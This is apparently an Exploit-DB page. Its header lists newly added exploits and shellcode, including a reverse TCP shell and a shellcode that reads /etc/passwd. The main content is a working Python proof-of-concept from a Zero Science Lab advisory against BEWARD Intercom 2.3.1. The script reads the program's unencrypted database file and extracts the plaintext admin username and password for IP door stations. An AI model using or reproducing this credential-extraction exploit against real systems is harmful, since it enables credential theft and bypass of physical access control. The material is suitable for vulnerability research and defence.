
26 changes to exploits/shellcodes Sricam gSOAP 2.8 - Denial of Service Smart VPN 1.1.3.0 - Denial of Service (PoC) MySQL User-Defined (Linux) x32 / x86_64 - sys_exec Function Local Privilege Escalation Easy Video to iPod Converter 1.6.20 - Buffer Overflow (SEH) R 3.4.4 XP SP3 - Buffer Overflow (Non SEH) BEWARD Intercom 2.3.1 - Credentials Disclosure Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass) CloudMe Sync 1.11.2 Buffer Overflow - WoW64 - (DEP Bypass) Rundeck Community Edition < 3.0.13 - Persistent Cross-Site Scripting WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download AirTies Air5341 Modem 1.0.0.12 - Cross-Site Request Forgery LogonBox Limited / Hypersocket Nervepoint Access Manager - Unauthenticated Insecure Direct Object Reference CMSsite 1.0 - 'cat_id' SQL Injection CMSsite 1.0 - 'search' SQL Injection Cisco RV300 / RV320 - Information Disclosure Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting Newsbull Haber Script 1.0.0 - 'search' SQL Injection Care2x 2.7 (HIS) Hospital Information System - Multiple SQL Injection Teameyo Project Management System 1.0 - SQL Injection Mess Management System 1.0 - SQL Injection MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting ResourceSpace 8.6 - 'collection_edit.php' SQL Injection Linux/x86 - exit(0) Shellcode (5 bytes) Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (2) Linux/ARM - Reverse TCP (/bin/sh) - 192.168.1.124:4321 Shellcode (64 bytes) Linux/ARM - Bind TCP (/bin/sh)-0.0.0.0:4321 Null Free Shellcode (84 bytes)
88 lines
No EOL
2.7 KiB
Python
Executable file
88 lines
No EOL
2.7 KiB
Python
Executable file
#!/usr/bin/env python
|
|
# -*- coding: utf8 -*-
|
|
#
|
|
# BEWARD Intercom 2.3.1 Credentials Disclosure
|
|
#
|
|
#
|
|
# Vendor: Beward R&D Co., Ltd
|
|
# Product web page: https://www.beward.net
|
|
# Affected version: 2.3.1.34471
|
|
# 2.3.0
|
|
# 2.2.11
|
|
# 2.2.10.5
|
|
# 2.2.9
|
|
# 2.2.8.9
|
|
# 2.2.7.4
|
|
#
|
|
# Note: For versions above 2.2.11: The application data directory, which
|
|
# stores logs, settings and the call records archive, was moved to ProgramData\BEWARD.
|
|
#
|
|
# New versions: C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB
|
|
# Old versions: C:\Users\%username%\AppData\Local\Beward R&D Co., Ltd\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB
|
|
#
|
|
# Summary: Multiaccessible User Operation, Electronic Lock Control, Real-Time
|
|
# Video, Two-Way Audio. The software is used for BEWARD IP video door stations
|
|
# control.
|
|
#
|
|
# Desc: The application stores logs and sensitive information in an unencrypted
|
|
# binary file called BEWARD.INTERCOM.FDB. A local attacker that has access to
|
|
# the current user session can successfully disclose plain-text credentials that
|
|
# can be used to bypass authentication to the affected IP camera and door station
|
|
# and bypass access control in place.
|
|
#
|
|
# Tested on: Microsoft Windows 10 Home (EN)
|
|
# Microsoft Windows 7 SP1 (EN)
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
# @zeroscience
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2019-5505
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5505.php
|
|
#
|
|
#
|
|
#
|
|
#######################################################################
|
|
# Output:
|
|
# --------
|
|
# C:\> python beward_creds.py
|
|
# Username: admin
|
|
# Password: S3cr3tP4$$w0rd
|
|
# C:\>
|
|
#
|
|
#######################################################################
|
|
#
|
|
# 28.11.2018
|
|
#
|
|
|
|
import subprocess
|
|
import mmap######
|
|
import re########
|
|
import os########
|
|
|
|
#
|
|
# For versions bellow 2.2.11:
|
|
#
|
|
# cuser = subprocess.check_output("echo %username%", shell=True)
|
|
# dbfile = ('C:\Users\\' + cuser.rstrip() + '\Ap'
|
|
# 'pData\Local\Beward R&D Co., Ltd\BEW'
|
|
# 'ARD Intercom\DB\BEWARD.INTERCOM.FDB'
|
|
# )
|
|
#
|
|
|
|
#
|
|
# For versions 2.2.11 and above:
|
|
#
|
|
|
|
dbfile = 'C:\ProgramData\BEWARD\BEWARD Intercom\DB\BEWARD.INTERCOM.FDB'
|
|
|
|
def mapfile(filename):
|
|
file = open(filename, "r+")
|
|
size = os.path.getsize(filename)
|
|
return mmap.mmap(file.fileno(), size)
|
|
|
|
data = mapfile(dbfile)
|
|
m = re.search(r"\xF7\x00\x07\x05\x00(.*?)\xD3\x00\x0E\x0C\x00", data)
|
|
print "Username: " + m.group(1)
|
|
m = re.search(r"\xD3\x00\x0E\x0C\x00(.*?)\xDA\x00\x11\x0F\x00", data)
|
|
print "Password: " + m.group(1) |